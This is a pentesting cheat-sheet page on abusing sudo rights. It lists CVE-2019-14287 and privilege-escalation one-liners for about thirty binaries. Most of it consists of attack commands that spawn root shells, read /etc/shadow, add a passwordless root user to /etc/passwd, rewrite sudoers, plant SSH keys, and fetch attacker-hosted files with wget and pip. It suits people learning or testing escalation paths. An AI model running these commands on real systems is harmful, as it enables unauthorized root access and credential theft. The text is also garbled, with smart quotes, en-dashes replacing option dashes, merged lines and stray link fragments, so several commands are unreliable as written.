search

Abusing Sudo Rights

hashtag
Resources

https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

https://gtfobins.github.io/

hashtag
CVE 2019-14287

# Exploitable when a user have the following permissions (sudo -l)
(ALL, !root) ALL

# If you have a full TTY, you can exploit it like this
sudo -u#-1 /bin/bash

# If no TTY, you can restart SSH server and add your key
sudo /etc/init.d/ssh restart
echo 'ssh-rsa AAAA[...snip...]fd48as= root@kali-jms' > authorized_keys
sudo -u#-1 bash

hashtag
Exploiting sudo

Binary program
Commands
Infos

apache2

sudo apache2 -f /etc/shadow

# You will get an error and it will # display first line

apt-get

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

awk

sudo awk ‘BEGIN {system(“/bin/sh”)}’

ed

sudo /usr/bin/ed !/bin/sh

find

sudo find /etc/passwd -exec /bin/sh \; sudo find /bin -name nano -exec /bin/sh \;

ftp

sudo ftp ftp> /!/bin/bash

gdb

sudo -u user gdb -q (gdb) shell

git

# Method 1 sudo -u user git -c core.pager=/tmp/script.sh –paginate help # Method 2 sudo git help add !/bin/bash

# Method 1 Create script.sh and chmod 777 → /bin/bash >&2 0>&2 # Method 2 You can also use the help add feature

ht

export TERM=xterm-color sudo ht /etc/sudoers # F3 to open the file, then update lines ALL=(ALL) NOPASSWD: ALL

less

sudo less /etc/hosts !sh

man

sudo man man !sh

more

sudo more /etc/hosts !sh

mount

sudo mount -o bind /bin/bash /bin/mount sudo mount

mysql

sudo mysql -e ‘!/bin/sh’

nano

sudo nano /etc/passwd

# You can then add a new root user openssl passwd -1 -salt user3 pass123 # /etc/passwd user3::0:0:root:/root:/bin/bash

nmap

# Method 1 sudo nmap –interactive nmap> !sh # Method 2 echo “os.execute(‘/bin/sh’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse

# Method 1 # Using –interactive option # Method 2 # Using –script option

pico

sudo -u user pico

# Type bash in editor an press ^T to # trigger spellchecker

pip

python -m SimpleHTTPServer 80 wget http://192.168.1.134/setup.pyarrow-up-right sudo pip install . –upgrade –force-reinstall

# You can use FakePip https://github.com/0x00-0x00/FakePip.gitarrow-up-right # Decode and change IP adress

rbash

echo $SHELL echo $PATH export SHELL=/bin/bash:$SHELL export PATH=/usr/bin:$PATH vi :!/bin/bash

rvim

rvim version

grep python echo “import os;os.system(‘bash’)” > /tmp/script.py sudo -u rvim -c “pyfile /tmp/script.py”

scp

sudo -u user scp -vv -C -S tmp/script.sh a whatever

# Create script.sh and chmod 777 → /bin/bash >&2 0>&2

script

sudo -u user script /tmp/what-ever

ssh

sudo -u user ssh -o ProxyCommand=/tmp/script.sh lel

# Create script.sh and chmod 777 → /bin/bash >&2 0>&2

strace / sysud64

sudo strace -o/dev/null /bin/bash sudo sysud64 -o/dev/null /bin/bash

tar

# Method 1 sudo -u user tar –checkpoint=1 –checkpoint-action=exec=/bin/bash -cf /tmp/12345.tar /dev/zero # Method 2 cd /tmpcp /bin/bash . sudo chown root:root /tmp/bash sudo mv /bin/tar /bin/tar.bak sudo mv /tmp/bash /bin/tar sudo /bin/tar

tcpdump

echo $’id\ncat /etc/shadow’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

teehee

echo “raaj::0:0:::/bin/bash”

sudo teehee -a /etc/passwd

vim

sudo vim -c ‘!sh’

wget

sudo wget http://ip/filePasswdarrow-up-right -O /etc/passwd su user1

# Attacker side # Copy target’s file /etc/passwd # Add a new user and host the fil

zip

# Method 1 touch /tmp/xyz; chmod 444 /tmp/xyz sudo -u user zip /tmp/zzz.zip /tmp/xyz -T -TT /tmp/script.sh # Method 2 touch raj sudo zip /tmp/nisha.zip /home/zico/raj -T –unzip-command=“sh -c /bin/bash”

# Create script.sh and chmod 777 → /bin/bash >&2 0>&2

PreviousSystem TricksNextSUID Files

Last updated